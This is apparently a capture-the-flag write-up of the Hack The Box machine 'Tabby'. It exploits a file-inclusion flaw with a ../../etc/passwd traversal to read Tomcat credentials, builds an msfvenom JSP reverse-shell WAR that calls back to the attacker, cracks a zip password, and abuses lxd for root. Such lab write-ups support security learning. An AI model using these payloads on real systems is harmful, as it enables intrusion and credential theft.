HTB Tabby Write-Up
User Flag
Result of nmap scan:
1 | PORT STATE SERVICE VERSION |
Like port 80 is open we launch gobuster on it in our terminal before heading to our browser to explore it. Exploring the “Mega Hosting” website, I found an interesting link behing the News option in the menu. It redirects to http://megahosting.htb/news.php?file=statement so let’s add first megahosting.htb
in our /etc/hosts
file and then take a good look at the structure of the URL: it suggests a LFI with the file variable.
To verify that, head to Burp Repeater, put /news.php?file=../../../../etc/passwd
as URI and we got the file.
1 | root:x:0:0:root:/root:/bin/bash |
From here, I just forgot about the running gobuster and tried getting RCE using different techniques illustrated in PayloadAllTheThings but they didn’t work. So it’s time to go explore the port 8080.
In the tomcat port, you will find the default index page when you just installed tomcat. The page tells us tomcat 9 is used, and gives some informations about some possible paths to explore for interesting files. Clicking on the link to tomcat manager asks us for a password. That means the manager is available but when I tried some default credentials, they did not work.
From all of that, the attach pattern became pretty clear: I need to use the LFI to read the tomcat-users.xml
file to gain access to the manager and upload a WAR that will give me reverse shell.
For about an hour I tried reading the tomcat-users.xml by using well known paths including the ones in the default index page but NO-THING! Then, I read again carefully the index page and paid attention to this:
You might consider installing the following packages, if you haven’t already done so:
It’s talking about a package manager then maybe the apt package manager when installing tomcat9 does not use standard configuration paths. To check it, I installed myself tomcat9 and query for the package installed files.
1 | No need to use sudo if you are already root |
The result is /usr/share/tomcat9/etc/tomcat-users.xml
which is not common at all and using it in our LFI gives us a file.
1 | <?xml version="1.0" encoding="UTF-8"?> |
He-he, we have a password! But be aware that this password is not associated to the role manager-gui
but manager-script
. This means, we can’t access to the manager html frontend with these credentials but only to the “API”. That said, let’s create our reverse shell war and upload it using curl.
1 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=4444 -f war -o rev_sh.war |
Now we head to http://megahosting.htb:8080/rev_sh/
and we catch a shell as user tomcat!
For the lateral movement to user ash
, you need to remember what you read in the News page of the website. They were hacked and they deactivated a functionality, so maybe there is still some files of that functionnality laying around. After spawning a TTY shell with python3 and exploring around, I found an encrypted backup at /var/www/html/files/16162020_backup.zip
. Let’s download it and use John the Ripper for cracking it.
1 | zip2john 16162020_backup.zip backuphash |
Try admin@it
as ash password and you become user ash.
Root Flag
Executing linEnum.sh to the box reveals user ash belongs to the group lxd
which is at 99% a vector for privilege escalation. You can find a tutorial on how to do it here. The only difficulty I found was with the filesystem. I couldn’t write or correctly read some directories like /home/ash
or /tmp
, so I just created a directory at /dev/shm/
as my workspace for the privesc.
Congratulations, you just rooted the box.